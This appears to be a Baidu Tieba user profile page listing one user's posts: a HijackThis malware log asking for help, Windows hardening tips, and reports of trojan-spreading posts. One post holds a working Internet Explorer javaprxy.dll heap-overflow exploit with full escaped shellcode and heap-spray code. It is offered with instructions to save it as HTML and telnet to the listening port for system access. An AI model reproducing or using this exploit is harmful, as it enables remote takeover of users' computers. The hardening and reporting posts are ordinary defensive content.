鑀情电灯泡 鑀情电灯泡
关注数: 26 粉丝数: 90 发帖数: 11,257 关注贴吧数: 23
病毒吧 求救 无法进入安全模式! HijackThis(zww3008汉化版)V1.99.1 保存于 9:59:53, 日期 2005-12-26 操作系统: Windows XP SP1 (WinNT 5.01.2600) 浏览器: Internet Explorer v6.00 SP1 (6.00.2800.1106) 当前运行的进程: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\csrss.exe C:\WINDOWS\SYSTEM32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\brsvc01a.exe C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\System32\brss01a.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\System32\Rundll32.exe C:\WINDOWS\System32\alg.exe C:\Program Files\InterBase Corp\InterBase\bin\ibguard.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\System32\rundll32.exe C:\Program Files\InterBase Corp\InterBase\bin\ibserver.exe C:\WINDOWS\System32\igfxtray.exe C:\WINDOWS\System32\hkcmd.exe C:\Program Files\Common Files\Real\Update_OB\realsched.exe C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe C:\Program Files\HP\hpcoretech\hpcmpmgr.exe D:\照片打印机程序\HP Software Update\HPWuSchd2.exe C:\WINDOWS\System32\hphmon05.exe C:\PROGRA~1\Yahoo!\Assistant\yassistse.exe C:\Program Files\Hewlett-Packard\OrderReminder\OrderReminder.exe C:\WINDOWS\System32\ctfmon.exe C:\WINDOWS\System32\HPZipm12.exe C:\Program Files\Internet Explorer\iexplore.exe C:\WINDOWS\System32\rundll32.exe C:\Program Files\WinRAR\WinRAR.exe C:\DOCUME~1\BLUEWA~1\LOCALS~1\Temp\Rar$EX00.065\HijackThis1991.exe R3 - URLSearchHook: 雅虎助手 - {406F94F0-504F-4a40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\Assistant\Assist\yasbar.dll O2 - BHO: 雅虎助手 - {406F94F0-504F-4a40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\Assistant\Assist\yasbar.dll O2 - BHO: QQIEHelper - {54EBD53A-9BC1-480B-966A-843A333CA162} - D:\安装\QQIEHelper.dll O2 - BHO: YDragSearch - {62EED7C6-9F02-42f9-B634-98E2899E147B} - C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\YDRAGS~1.DLL O2 - BHO: MMSAssist - {6671A431-5C3D-463d-A7CF-5587F9B7E191} - C:\PROGRA~1\MMSASS~1\MMSASS~1.DLL O2 - BHO: std software - {6A512BF7-EC78-4e8d-9841-6C02E8FA9838} - C:\WINDOWS\SYSTEM32\stdup.dll O2 - BHO: BrowseHelper Class - {80BF4637-D65B-43F3-BB60-C5DD3D5FB7B9} - C:\Program Files\KV2005\KvShell.dll O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\PROGRA~1\FLASHGET\jccatch.dll O2 - BHO: IE - {D157330A-9EF3-49F8-9A67-4141AC41ADD4} - C:\WINDOWS\DOWNLO~1\CnsHook.dll O3 - IE工具栏增项: 电台(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O3 - IE工具栏增项: 雅虎助手 - {406F94F0-504F-4a40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\Assistant\Assist\yasbar.dll O3 - IE工具栏增项: 江民杀毒工具栏 - {B5A34A93-D538-43A7-8371-864CB6148D12} - C:\Program Files\KV2005\KvShell.dll O4 - 启动项HKLM\\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - 启动项HKLM\\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
让黑客无奈,停止以下服务 控制面板→管理工具→服务1.Alerter[通知选定的用户和计算机管理警报]2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享4.Distributed Link Tracking Server[适用局域网分布式链接跟踪客户端服务]5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]6.IMAPI CD-Burning COM Service[管理 CD 录制]7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]8.Kerberos Key Distribution Center[授权协议登录网络]9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]10.Messenger[警报]11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]14.Print Spooler[打印机服务,没有打印机就禁止吧]15.Remote Desktop Help Session Manager[管理并控制远程协助]16.Remote Registry[使远程计算机用户修改本地注册表]17.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持 而使用户能够共享文件、打印和登录到网络]21.Telnet[允许远程用户登录到此计算机并运行程序]22.Terminal Services[允许用户以交互方式连接到远程计算机]23.Windows Image Acquisition (WIA)[照相服务,应用与数码摄象机]可能会让某些工作无法运行, :)需要的时候再启动吧!
计算机反黑客安全设置 1:禁用“共享资源”(1)在网络连接中去掉“Microsoft 网络文件和打印机共享”组件;(2)在网络连接中去掉“NetBEUI(NetBIOS)协议”(3)去掉 TCP/IP 中的 NetBIOS 协议功能。2:禁用“IPC$”IPC 是 Windows 用来建立二台计算机进程之间通信的一种通道,也叫“命名管道”。但它成了黑客攻击的主要对象。黑客用IP地址、用户名、密码就可通过 IPC$ 进入你的计算机,甚至只要 IP 地址就可以连通,特别是 Windows 内置Administrator 帐户没有密码时,计算机一点安全性也没有。通过【计算机管理】|【服务】关闭 Server 服务,禁用 IPC$。通过【计算机管理】|【会话】可以查看是否有 IPC$ 入侵并确定入侵者的 IP。3:安全设置计算机的帐户和密码(1)改变内置 Administrator 帐户的名字;(2)关掉 Guest 等不用的帐户(2)所有帐户名和帐户密码要坚固,这一点对上网计算机非常重要。从我了解的情况来看,我们对计算机帐户名和帐户密码设置根本不重视,内置Administrator 帐户密码简单,自己使用的帐户设置很简单如 IBM、DELL等,还没有密码,这样的计算机有严重的安全隐患。4:禁用“Telnet”通过【计算机管理】|【服务】禁用 Telnet 服务。不过如果黑客通过 IPC$ 联入了你的计算机,你禁用了他也可以打开。5:SQL Server 2000 安全设置如果计算机因工作需要装了 SQL Server 2000 服务器,则千万别忘记对 SQL Server 2000 服务器的 Sa 帐户设置密码。黑客很容易从 Sa 帐户入侵后再控制你的计算机。6:如果不是工作需要,不要安装 Windows 的 IIS,IIS 的漏洞有上千种,最容易产生安全问题。7:关闭“远程协助”、“远程桌面”。8:对 Windows 每日更新。对盗版的 Windows XP 无法安装 SP2包。从我使用的情况来看, Microsoft 加大了盗版打击力度,但正版的并没有完全限制只能装在一个计算机上。9:学会正确配置和使用网络防火墙。
网页溢出木马!监听28876端口, Microsoft Internet Explorer存在一个堆溢出漏洞。当一个恶意的网页实例化'javaprxy.dll' COM对象时,可能导致堆溢出,成功利用该漏洞能够以客房端上下文执行任意代码。 shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");bigblock = unescape("%u0D0D%u0D0D");headersize = 20;slackspace = headersize+shellcode.lengthwhile (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length-slackspace);while(block.length+slackspace<0x40000) block = block+block+fillblock;memory = new Array();for (i=0;i<750;i++) memory[i] = block + shellcode; Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploitby the FrSIRT < http://www.51dj.org >Solution - http://www.frsirt.com/english/advisories/2005/0935 location.reload();另存为html然后telnet得到system32权限 :)想教大家一些黑客基础知识,不知道大家有没有意见
还是木马 http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=371731301&z=48509884&pn=0&rn=50&lm=0&word=%B6%AB%D6%B1%C3%C5%D6%D0%D1%A7#371731301http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=371583457&z=48541639&pn=0&rn=50&lm=0&word=%B6%AB%D6%B1%C3%C5%D6%D0%D1%A7#371583457http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=325581735&z=39723857&pn=0&rn=50&lm=0&word=%D0%BB%F6%AA%B7%E6#325581735http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315892136&z=37941135&pn=0&rn=50&lm=0&word=%BB%F0%D3%B0%C8%CC%D5%DF#315892136http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315891025&z=37941009&pn=0&rn=50&lm=0&word=%CB%C0%CD%F6%B1%CA%BC%C7#315891025http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315889192&z=37940775&pn=0&rn=50&lm=0&word=%BA%A3%D4%F4%CD%F5#315889192http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315888315&z=37940670&pn=0&rn=50&lm=0&word=%C8%AE%D2%B9%B2%E6#315888315http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315375377&z=37864499&pn=0&rn=50&lm=0&word=%BB%F0%D3%B0%C8%CC%D5%DF#315375377http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315373978&z=37864230&pn=0&rn=50&lm=0&word=%C8%AE%D2%B9%B2%E6#315373978http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315373047&z=37864060&pn=0&rn=50&lm=0&word=%CB%C0%CD%F6%B1%CA%BC%C7#315373047http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=315372296&z=37863923&pn=0&rn=50&lm=0&word=%BA%A3%D4%F4%CD%F5#315372296http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=306297524&z=36656293&pn=0&rn=50&lm=0&word=%D5%C5%BA%AC%D4%CF#306297524http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284884189&z=33731303&pn=0&rn=50&lm=0&word=%BA%BD%BF%D5%C4%B8%BD%A2#284884189http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284871752&z=33726466&pn=0&rn=50&lm=0&word=%C8%C8%D1%AA%BD%AD%BA%FE#284871752http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284861410&z=33727639&pn=0&rn=50&lm=0&word=%C1%D6%D0%C4%C8%E7#284861410http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284858151&z=33727141&pn=0&rn=50&lm=0&word=%C1%F5%D2%E0%B7%C6#284858151http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284856655&z=33726948&pn=0&rn=50&lm=0&word=s%2Eh%2Ee#284856655http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284854929&z=33726704&pn=0&rn=50&lm=0&word=%D6%DC%BD%DC%C2%D7#284854929http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284850457&z=33725990&pn=0&rn=50&lm=0&word=%CB%EF%D1%E0%D7%CB#284850457http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=284848558&z=33725711&pn=0&rn=50&lm=0&word=%D5%C5%BA%AC%D4%CF#284848558
举报!发布木马! http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463949806&z=70212013&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463949806http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463945209&z=70211473&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463945209http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463913349&z=70207368&pn=0&rn=50&lm=0&word=%CE%DE%BC%AB#463913349http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463207733&z=70067398&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463207733http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463207438&z=70105559&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463207438http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463206878&z=70101244&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463206878http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463197489&z=70103514&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463197489http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463197056&z=70083853&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463197056http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463196576&z=70052150&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463196576http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463187588&z=70022240&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463187588http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=463184454&z=70102811&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#463184454http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=462355603&z=69985490&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#462355603http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=462351146&z=69996619&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#462351146http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=462318082&z=69992609&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#462318082http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=462317079&z=69992011&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#462317079http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=462315032&z=69992204&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#462315032http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=462313731&z=69992574&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#462313731http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=458062093&z=69491748&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#458062093http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=454120079&z=68982093&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#454120079http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=454116031&z=68981614&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#454116031http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=454114263&z=68982756&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#454114263http://post.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=454112993&z=68984368&pn=0&rn=50&lm=0&word=%C0%EE%D3%EE%B4%BA#454112993pcshare木马,导致用户被完全控制!谢谢处理!
首页 1 2 3 4 下一页